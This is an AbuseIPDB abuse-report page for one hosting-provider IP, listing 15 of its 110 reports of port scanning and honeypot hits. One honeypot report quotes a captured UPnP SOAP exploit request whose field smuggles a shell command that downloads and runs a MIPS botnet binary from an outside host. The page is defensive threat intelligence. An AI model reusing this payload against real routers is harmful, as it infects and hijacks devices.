JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 72.18.200.63

72.18.200.63 was found in our database!

This IP was reported 110 times. Confidence of Abuse is 100%: ?

100%

ISP	Santa Clara, CA Data Center
Usage Type	Data Center/Web Hosting/Transit
ASN	AS26277
Hostname(s)	santaclara-ca-datacenter.serverpoint.com
Domain Name	lasvegas-nv-datacenter.com
Country	🇺🇸 United States of America
City	Santa Clara, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 72.18.200.63

Whois 72.18.200.63

IP Abuse Reports for 72.18.200.63:

This IP address has been reported a total of 110 times from 57 distinct sources. 72.18.200.63 was first reported on June 16th 2026, and the most recent report was 2 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇦🇹 urnilxfgbez	2026-06-19 22:45:00 (2 hours ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇺🇸 RAP	2026-06-19 20:42:36 (4 hours ago)	2026-06-19 20:42:36 UTC Unauthorized activity to TCP port 2323. Telnet	Port Scan
🇧🇷 diego	2026-06-19 19:11:21 (5 hours ago)	[rede-164-29] 06/19/2026-16:11:20.841949, 72.18.200.63, Protocol: 6, ET CINS Active Threat Intellige ... show more [rede-164-29] 06/19/2026-16:11:20.841949, 72.18.200.63, Protocol: 6, ET CINS Active Threat Intelligence Poor Reputation IP group 114 show less	Hacking
🇲🇳 Public CSIRT/CC of Mongolia	2026-06-19 19:03:03 (5 hours ago)	Honeypot hit: Unauthorized connection attempt detected on 23/TELNET	Hacking IoT Targeted Port Scan
🇧🇷 diego	2026-06-19 17:42:08 (7 hours ago)	[rede-164-29] 06/19/2026-14:42:07.380605, 72.18.200.63, Protocol: 6, ET CINS Active Threat Intellige ... show more [rede-164-29] 06/19/2026-14:42:07.380605, 72.18.200.63, Protocol: 6, ET CINS Active Threat Intelligence Poor Reputation IP group 114 show less	Hacking
🇺🇸 RAP	2026-06-19 17:21:02 (7 hours ago)	2026-06-19 17:21:02 UTC Unauthorized activity to TCP port 2323. Telnet	Port Scan
🇺🇸 MPL	2026-06-19 17:07:32 (7 hours ago)	tcp/23	Port Scan
🇩🇪 xserverx.ru	2026-06-19 15:46:22 (9 hours ago)	[UFW SCAN!!!!] SRC=72.18.200.63 LEN=40 TOS=0x08 PREC=0x20 TTL=42 PROTO=TCP SPT=41941 DPT=23 WINDOW=4 ... show more [UFW SCAN!!!!] SRC=72.18.200.63 LEN=40 TOS=0x08 PREC=0x20 TTL=42 PROTO=TCP SPT=41941 DPT=23 WINDOW=4949 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇵🇱 genokrad	2026-06-19 14:12:56 (10 hours ago)	Unauthorized connection attempt on TCP/23 (Telnet)	Port Scan
🇺🇸 RAP	2026-06-19 13:00:53 (11 hours ago)	2026-06-19 13:00:53 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇩🇪 ValtonTahiri	2026-06-19 12:27:50 (12 hours ago)	UFW blocked a suspicious connection attempt to a closed or denied port. This activity is commonly as ... show more UFW blocked a suspicious connection attempt to a closed or denied port. This activity is commonly associated with port scanning, service discovery, or automated internet probing. Technical: source_ip=72.18.200.63; proto=TCP; source_port=41941; target_port=23; flags=SYN show less	Port Scan
🇺🇸 MPL	2026-06-19 11:57:43 (12 hours ago)	tcp ports: 23,2323 (2 or more attempts)	Port Scan
🇧🇷 diego	2026-06-19 11:53:35 (12 hours ago)	[rede-164-29] 06/19/2026-08:53:35.080672, 72.18.200.63, Protocol: 6, ET CINS Active Threat Intellige ... show more [rede-164-29] 06/19/2026-08:53:35.080672, 72.18.200.63, Protocol: 6, ET CINS Active Threat Intelligence Poor Reputation IP group 114 show less	Hacking
🇬🇧 gbzret4d	2026-06-19 11:27:49 (13 hours ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇺🇸 MPL	2026-06-19 10:14:11 (14 hours ago)	tcp ports: 5555,23 (3 or more attempts)	Port Scan

Showing 1 to 15 of 110 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 147.185.132.111

🇨🇳 118.145.225.50

🇩🇪 69.5.169.74

🇹🇼 198.235.24.120

🇦🇷 186.22.54.97

🇳🇱 185.242.226.66

🇧🇷 181.189.10.55

🇳🇱 176.65.149.236

🇹🇷 172.69.250.140

🇺🇸 162.216.149.85

🇨🇳 116.167.6.143

🇻🇳 113.168.228.92

🇰🇷 112.217.188.122

🇮🇳 106.205.141.108

🇸🇬 103.189.235.114

🇫🇷 90.63.199.41

🇮🇳 43.228.166.224

🇺🇸 18.119.97.180

🇸🇪 193.31.126.145

🇫🇷 172.71.119.54